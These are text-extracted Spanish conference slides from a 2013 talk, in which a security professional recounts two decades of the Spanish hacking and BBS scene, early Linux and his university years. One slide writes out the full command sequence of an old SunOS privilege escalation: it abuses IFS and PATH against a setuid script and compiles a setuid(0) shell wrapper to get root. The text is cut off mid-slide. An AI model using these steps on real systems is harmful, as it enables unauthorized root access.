Mundo hacking
UPM TASSI 2013
Román Ramírez Giménez
<
[email protected]>
@patowc
1
IX Ciclo de Conferencias UPM TASSI 2013
Quién soy
Responsable de Seguridad en
Arquitecturas, Sistemas y Servicios de
Ferrovial.
Coorganizador de RootedCON.
Hacker.
IX Ciclo de Conferencias UPM TASSI 2013
2
¿De qué trata esta charla?
El Mundo del Hacking: a través de mis ojos.
Mis últimos veinte años: desde 1992/1993
hasta ahora.
Una opinión particular y personal sobre
qué es hacking y qué es el mundo del
hacking.
IX Ciclo de Conferencias UPM TASSI 2013
3
Antecedentes
Cult of Dead Cow, 1984
Phrack Magazine, 1985
The Mentor, LoD, Loyd Blankenship, 08/01/1986.
Manual del novicio hacker, Ender Wiggins, 1987.
HoHoCon: Drunkfux, Jesse Dryden, 1990.
Operación Sundevil, 1990.
“The Hacker Crackdown”, Bruce Sterling.
Operación Millenium, 2000.
IX Ciclo de Conferencias UPM TASSI 2013
4
The Conscience of a Hacker
http://www.phrack.org/issues.html?issue=7&id=3
“Yes, I am a criminal. My crime is that of
curiosity. My crime is that of judging
people by what they say and think, not what
they look like.
My crime is that of outsmarting you,
something that you will never forgive me for.
I am a hacker, and this is my manifesto. You
may stop this individual, but you can't stop
us all... after all, we're all alike.
+++The Mentor+++”
IX Ciclo de Conferencias UPM TASSI 2013
5
Primeros pasos
IX Ciclo de Conferencias UPM TASSI 2013
6
Primeros pasos
1987
ZX81: no puede sacarle partido.
Spectrum+ 48k: Juegos, BASIC,
Ensamblador z80, Transtape, Cintas de
video, ¡LOS POKES!
Parada durante algunos años: jugando a
rol…
Cyrix 486SLC, de palo (entre 386/486 “on
steroids” + copro): primera pardillada.
IX Ciclo de Conferencias UPM TASSI 2013
7
IX Ciclo de Conferencias UPM TASSI 2013
8
Primeros pasos (ii): hackers
Glaucoma: ZARAGOZA
http://hackstory.net/Glaucoma
Oficialmente desde 1987 a 1989
Posteriormente Apòstols…
1987
IX Ciclo de Conferencias UPM TASSI 2013
9
Primeros pasos: segunda etapa
Ya con el PC (recordad, el Cirix)
MS-DOS y Win 3.1
Programación: ¿BASIC?
El BARROTES: segunda pardillada…
1993
IX Ciclo de Conferencias UPM TASSI 2013
10
Segunda etapa: hackers
Apòstols: “joshua!” ;)
http://hackstory.net/Apòstols
Oficialmente desde 1989 a - ¿?
1989
IX Ciclo de Conferencias UPM TASSI 2013
11
Segundos pasos
IX Ciclo de Conferencias UPM TASSI 2013
12
Segundos pasos
x;
y;
z;
C++: quería hacer cosas más elaboradas...
class Punto {
intfloat
intfloat
intfloat
}
Turbo C, Borland C/C++ 3.1, DJGPP,
Watcom DOS/4GW ¡32bits! ¡Y modo
protegido!
IX Ciclo de Conferencias UPM TASSI 2013
13
IX Ciclo de Conferencias UPM TASSI 2013
14
Segundos pasos (ii)
Y descubrí las BBS: Public NME, The Light,
encomIX, EUTIZ, Parser BBS, El Sol BBS,
Movera, Chessnia BBS (Zaragoza), +BYTES
(Pamplona), Edison BBS (en Madrid), …
FidoNET, Subnet, RedBBS, LibreNET…
Bluewave, Frontdoor, Remote Access…
Public NME BBS: 2:342/1
1993
IX Ciclo de Conferencias UPM TASSI 2013
15
Segundos pasos: patowc
A punto de entrar en “El Mundo” (el de
verdad, BBS, Internet, …) necesitaba un
alias (todo el mundo lo tenía).
La gente se toma demasiado en serio a sí
misma… Medité:
“¿Cómo recordarme siempre que no debo
tomarme demasiado en serio a mí mismo?”
IX Ciclo de Conferencias UPM TASSI 2013
16
Segundos pasos: patowc
¿He dicho que jugaba a rol? Retomé un
personaje de RuneQuest y escogí un
nombre lo más ridículo posible: patowc.
Pero también tenía otros aliases,… ROT
(Roger O. Thornhill), “El gato” (John Robie),
MB (Mortimer Brewster), Eldritch, Overload,
RO/RW, Jano…
Pero siempre: patowc.
17
IX Ciclo de Conferencias UPM TASSI 2013
Segundos pasos (iii): más hackers
Public NME BBS: 2:342/1 antigua Scroll
Lock BBS…
Scroll Lock BBS herencia de Bauhaus...
Bauhaus la montaron Depeche Mode y Han
Solo (glaucoma)…
Public NME la montó Depeche Mode (Michel
Izquierdo)…
IX Ciclo de Conferencias UPM TASSI 2013
18
Segundos pasos (iv): más hackers
Depeche Mode y Han Solo comenzaron
crackeando videojuegos (Super Rata
Software y AWD).
Posteriormente pasaron al hacking…
Gente que conocí en esa época en el
mundillo de las BBS…
IX Ciclo de Conferencias UPM TASSI 2013
19
Segundos pasos (v): más hackers
Recuerdo especialmente una noche que
estaba conectado a Public NME que, Michel
Izquierdo, “El SysOp” (dios) me abrió una
conversación y me dijo:
“¿Tú programas?”
Con el tiempo, pude responder sí, fui
cosysop de NME, “kdds”, “los huevos”…
IX Ciclo de Conferencias UPM TASSI 2013
20
Segundos pasos (vi): más hackers
Y otra noche, que conectado a encomIX BBS
quedé con rampa y me fui a visitarle a las
oficinas de “Diario 16”.
Mis primeras direcciones de correo-e:
[email protected]
[email protected]
(me “rutaba” los correos Ramón a mano)
IX Ciclo de Conferencias UPM TASSI 2013
21
Segundos pasos (vii): más hackers
encomIX, que se llamaba originalmente
encom (Tron).
Waffle BBS: traduje el manual a español
(todavía guardo una copia impresa).
Y, finalmente, terminé trabajando en
encomIX, el ISP…
IX Ciclo de Conferencias UPM TASSI 2013
22
IX Ciclo de Conferencias UPM TASSI 2013
23
Segundos pasos (y viii)
1993
iGUANA: demoscene, David Tolosana, Noisyman
(http://modarchive.org/index.php?request=view_by_
moduleid&query=69751)
Radioaficionados: EB/EA, el zorro, packetradio…
LINUX: slackware y kernel 0.97
Mi primera BBS: Remote Access
DESQview/X
OS/2 Warp: el único sistema operativo que he
comprado nunca.
1993/1994
IX Ciclo de Conferencias UPM TASSI 2013
1994/1995
24
slackware
IX Ciclo de Conferencias UPM TASSI 2013
25
slackware
Cansado de problemas y tras la frustración
con Barrotes sentía que “tenía que haber
algo más”.
Conocí linux a través de un amigo de la
Universidad de Zaragoza.
Mi primer contacto fue una caja de
disquetes con 52 discos de tres y medio
IX Ciclo de Conferencias UPM TASSI 2013
26
slackware (ii)
Nunca se me olvidará la instalación (de la
serie “N” no me funcionaba ningún disco).
Ni el prompt tras el arranque:
IX Ciclo de Conferencias UPM TASSI 2013
27
slackware (iii)
En esta etapa aprendí cosas como
UNIX/Linux, “vi”, libc, sockets…
“UNIX Network Programming” y
“Advanced Programming in the UNIX
environment”, W. Richard Stevens
“The C Programming Language”, Brian
Kernighan y Dennis Ritchie.
IX Ciclo de Conferencias UPM TASSI 2013
28
slackware (iv): hackers
1996/1997
Por estas fechas…
JJF Hackers, La Vieja Guardia (el famoso
OOB de Billsucks), Revista SET…
Operación Toco: Universidad Rovira i Virgili
y un par de estudiantes “rebeldes”.
Operación Tornado: Warez de Barcelona y
Tenerife…
Primera Undercon: ¡Murcia!
1997
IX Ciclo de Conferencias UPM TASSI 2013
29
slackware (v): hackers
“Manual del novicio hacker”, por Ender
Wiggins (que luego descubrí que era rampa)
sunsniff.c: me “pidieron” desde la
Universidad que lo borrara de la BBS. Ni
hablar.
Conocí “strobe”: Julian Assange, 1995. Mi
primer portscanner…
Anselmo del Moral y las FCSE…
30
IX Ciclo de Conferencias UPM TASSI 2013
slackware (y vi)
Etapa tranquila centrado en aprender a
programar bien, entender los sistemas
operativos…
Mi única actividad “dudosa” se relacionaba
con el “trading” y el “warez”.
20 de mayo de 1997: Black Wraith.
1997
IX Ciclo de Conferencias UPM TASSI 2013
31
La universidad
IX Ciclo de Conferencias UPM TASSI 2013
32
La universidad
Durante el proceso anterior, comencé a
estudiar Ingeniería Informática de Sistemas.
Mi objetivo era: aprender un montón, todo lo
que no sabía…
Mi decepción fue tremenda. De tal calibre
que, durante muchos años, directamente no
quise volver a saber nada del mundo
académico.
IX Ciclo de Conferencias UPM TASSI 2013
33
La universidad (ii)
Muestra: Pascal, modula-2, Oberon… y
llevaba ya bastante tiempo programando en
C/C++… (WTF?)
Muestra: Internet una red en árbol ¿? ¿?
Tras los años me di cuenta de que el único
responsable de no encajar era yo, y lo
retomé ya con ganas.
IX Ciclo de Conferencias UPM TASSI 2013
34
La universidad (iii)
Pero saqué cosas muy interesantes
Mi primer hack:
– Script sonido_acceso.sh con bit setuid. Este script
ejecutaba algo como “cat sonido.aiff
/dev/dispositivosonido” (SunOS)
– root.
– ¿Mi error? Abrir la bocaza. Me suspendieron la cuenta
(tenía como otras setecientas).
– Pero me nadie me pudo quitar la sonrisa de la boca (la
sigo teniendo ).
IX Ciclo de Conferencias UPM TASSI 2013
35
La universidad (iii bis): el proceso
~$ ln –s /usr/bin/sonido_acceso.sh
sonidoacceso
~$ cp /bin/sh sh
~$ cat usr.c
#include … int main(){setuid(0); setgid(0);
seteuid(0); setegid(0);system(“sh”); return
0; }
~$ cc –o usr usr.c
~$ export IFS=/ && export PATH=.:$PATH
~$ ./sonidoacceso
~#
IX Ciclo de Conferencias UPM TASSI 2013
36
La universidad (iv)
Amigos. Contactos. Relaciones.
Kobalt of Nod, Eldritch of Nod, JCD, Black
Wraith, Sergio DJ, Marcus Kowalski, Rmur,
Davmac, Noisyman, chapulin…
LIA01: la “puta” ;)
Uniovi: la otra “puta”, cómo vi más adelante
“Línea piloto”
37
IX Ciclo de Conferencias UPM TASSI 2013
La universidad (v)
Nuestro segundo hack:
– La idea no fue mía.
– Red Novell (creo) y editores de texto en MSDOS.
– Prácticas de asignaturas: los documentos de los
alumnos se almacenaban en carpetas de red.
– Cuando ocurrían errores, los ficheros de bloqueaban. El
administrador de la sala, los desbloqueaba.
– Un genio: copiaba un programa de desbloqueo en el
disco local y luego, “liberaba” el fichero con problemas.
– UNDELETE… y modificar la configuración de la red.
IX Ciclo d
Comentarios de: Mundo hacking UPM TASSI 2013 (0)
No hay comentarios